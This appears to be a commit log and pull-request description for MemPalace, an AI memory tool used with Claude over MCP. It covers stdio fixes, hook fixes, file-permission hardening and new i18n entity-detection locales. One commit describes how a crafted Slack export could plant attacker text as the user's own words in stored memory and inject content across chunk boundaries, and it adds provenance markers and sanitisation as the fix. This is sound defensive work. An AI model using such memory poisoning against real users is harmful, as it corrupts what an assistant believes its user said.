This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case.

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like:

MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout.
Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225

* fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)

* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid "allow" decision value

Claude Code only recognizes "block" as a top-level decision value. "allow" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872.

* feat: include created_at timestamp in search results (#846)

* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries.
* feat: add fallback for missing filed_at metadata

* fix: add provenance header and speaker IDs to Slack transcript imports (#815)

* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal

Refs: MemPalace/mempalace#809

* fix: restrict file permissions on sensitive palace data (#814)

* fix: restrict file permissions on sensitive palace data

On Linux with default umask (022), several files and directories containing personal data were created world-readable.
This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility.

Files hardened:
- hooks_cli.py: hook_state/ directory and hook.log
- entity_registry.py: entity_registry.json (names, relationships)
- knowledge_graph.py: knowledge_graph.sqlite3 parent directory
- exporter.py: export output directory and wing subdirectories
- config.py: people_map.json (name mappings)
- mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix)

Refs: MemPalace/mempalace#809

* fix: avoid redundant chmod calls on hot paths

- hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event)
- exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches
- mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically

Refs: MemPalace/mempalace#809

* test: add palace_graph tunnel helper coverage

Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`

* refactor(entity_detector): make multi-language extensible via i18n JSON

Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged.
Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship.

* test: document orphan-locale recovery for _temp_locale helper

* feat: add Russian language support to i18n module

Add ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory.

* feat(i18n): add entity detection section to Russian locale

Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords.
Follows the i18n entity framework from #911.

* fix(i18n): apply review feedback on ru.json (#760)

- mine_skip: "повторной раскопки" -> "повторной обработки"
- quote_pattern: add Russian guillemet quotes «»

Co-Authored-By: almirus <[email protected]>

* feat(i18n): expand Russian entity stopwords with prepositions and conjunctions

Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial.

Co-Authored-By: almirus <[email protected]>

* feat: add italian i18n support

* feat: add italian entity patterns

* Updated hi.json to support infra for entity, pronoun_patterns, dialogue_patterns, direct_address_pattern, project_verb_patterns and stopwords

* feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117)

CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (João, Inês, Ângela). Follows the i18n entity framework from #911.

* fix(i18n): address review feedback on pt-br.json

- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

* feat(cli): add version display and version flag to CLI

Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit.

* fix(i18n): resolve language codes case-insensitively (#927)

BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning.
The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it.

Closes #927

* fix(i18n): use Optional[str] for Python 3.9 compatibility

PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead.

* fix(entity_detector): script-aware word boundaries for combining-mark scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. The same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged.

Changes:
- mempalace/i18n/__init__…
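The matra problem can be verified with Python's `re` directly. A self-contained sketch — the lookaround below mirrors the approach the commit describes, not the exact library code:

```python
import re

text = "राज ने कहा"  # "Raj said" -- कहा ends in the matra ा (category Mc, not \w)

# Standard \b fails after the final matra, so the pattern never matches:
assert re.search(r"\bराज\s+ने\s+कहा\b", text) is None

# And candidate extraction truncates names mid-word (अनीता -> अनीत):
assert re.findall(r"\b[\u0900-\u097F]+\b", "अनीता") == ["अनीत"]

# Script-aware boundary: treat all Devanagari codepoints as "inside-word"
# and replace \b with negative lookarounds over that class.
INSIDE = r"\w\u0900-\u097F"
pattern = rf"(?<![{INSIDE}])राज\s+ने\s+कहा(?![{INSIDE}])"
assert re.search(pattern, text) is not None
```

The same substitution generalizes: any `\b` in a locale's patterns becomes `(?<![...])` / `(?![...])` built from that locale's declared boundary characters.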
What does this PR do?
Closes #117 by adding a Brazilian Portuguese locale (`pt-br.json`) to the i18n module. This is the first non-English locale to include the `entity` section introduced in #911, enabling entity detection for Portuguese text.

Single-file change, no Python modifications.
What's in pt-br.json
CLI strings -- palace terminology (palácio, ala, corredor, armário, gaveta), all CLI messages, AAAK compression instruction, regex patterns for Portuguese topic extraction.
Entity detection (the `entity` section):

- `candidate_pattern` -- Latin+diacritics character class (`[A-ZÀ-Ú][a-zà-ý]`) so names like João, Inês, Ângela are extracted as candidates
- `multi_word_pattern` -- same charset for multi-word names
- `person_verb_patterns` -- disse, perguntou, respondeu, contou, riu, sorriu, chorou, sentiu, pensa, quer, ama, odeia, sabe, decidiu, escreveu
- `pronoun_patterns` -- ela/dele/ele/dela + plurals
- `dialogue_patterns` -- Portuguese quoted-speech markers
- `direct_address_pattern` -- oi, olá, obrigado/obrigada, caro/cara
- `project_verb_patterns` -- construindo, lançou, implantou, instalou + technical patterns
- `stopwords` (greetings, adverbs, prepositions, conjunctions, determiners, pronouns)

Note: `caro`/`cara` are intentionally NOT in stopwords -- they are valid first names in Portuguese/Italian/English.

How to test
```
python -m pytest tests/test_entity_detector.py -v
python -m pytest tests/ --ignore=tests/benchmarks
ruff check .
```

Quick smoke test:
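A self-contained sketch exercising two of the pt-br patterns described above (illustrative only -- the shipped patterns live in `pt-br.json` and are loaded via `get_entity_patterns`, which is not imported here):

```python
import re

# Standalone approximations of two pt-br.json entity patterns.
candidate = re.compile(r"\b[A-ZÀ-Ú][a-zà-ý]+\b")
person_verb = re.compile(r"\b(disse|perguntou|respondeu)\b")

text = "João disse que a Inês respondeu ontem."

# Accented names survive candidate extraction:
assert candidate.findall(text) == ["João", "Inês"]
# Portuguese person-verbs are recognized as signals:
assert person_verb.findall(text) == ["disse", "respondeu"]
```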
Checklist
- `get_entity_patterns(("en", "pt-br"))`
- `score_entity`
- `ruff check .` clean

Original PR description (before #911 refactor, no longer applies)
What does this PR do?
Closes #117 by extending `entity_detector` so a file written in Brazilian Portuguese is treated the same way an English file is: names get extracted as candidates, and verb / pronoun / dialogue / direct-address patterns contribute to the person-vs-project classification. The change is purely additive, so English-only corpora behave exactly as before.

Concretely:
- `PERSON_VERB_PATTERNS_PTBR`, `PRONOUN_PATTERNS_PTBR`, `DIALOGUE_PATTERNS_PTBR` constants with the Portuguese equivalents of the existing English signals (said/asked/replied/thinks/wants, plus greetings oi/olá/obrigado/caro).
- `_build_patterns` concatenates the English and pt-br lists for the dialogue and person-verb buckets, so every compiled matcher for an entity now covers both languages at once.
- `score_entity` merges the English and pt-br pronoun lists for the proximity check.
- `extract_candidates` widens its Latin-1 character class so accented names like João, Inês, Ângela, and André flow through candidate extraction instead of being silently dropped by an ASCII-only regex.
- `STOPWORDS` gets the Portuguese greeting fillers (oi, olá, obrigado, obrigada, caro, cara) so they do not masquerade as entity candidates when they start sentences.

This approach was replaced after #911 landed -- all patterns now live in `mempalace/i18n/pt-br.json` instead of Python constants. Same detection coverage, zero Python changes.
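The candidate-extraction widening is the part that is easiest to see in isolation. A sketch with a hypothetical before/after pair of character classes -- the exact classes shipped may differ:

```python
import re

ascii_only = re.compile(r"\b[A-Z][a-z]+\b")        # pre-#117 behaviour
widened = re.compile(r"\b[A-ZÀ-Ú][a-zà-ý]+\b")     # Latin-1 + diacritics

text = "Ângela e João conversaram com Pedro."

# The ASCII class silently drops every accented name:
assert ascii_only.findall(text) == ["Pedro"]
# The widened class keeps them:
assert widened.findall(text) == ["Ângela", "João", "Pedro"]
```

Note that `\b` works here because Latin diacritics are alphabetic (`\w`) in Python's `re`; combining-mark scripts need the lookaround treatment described in the #911 follow-up commits.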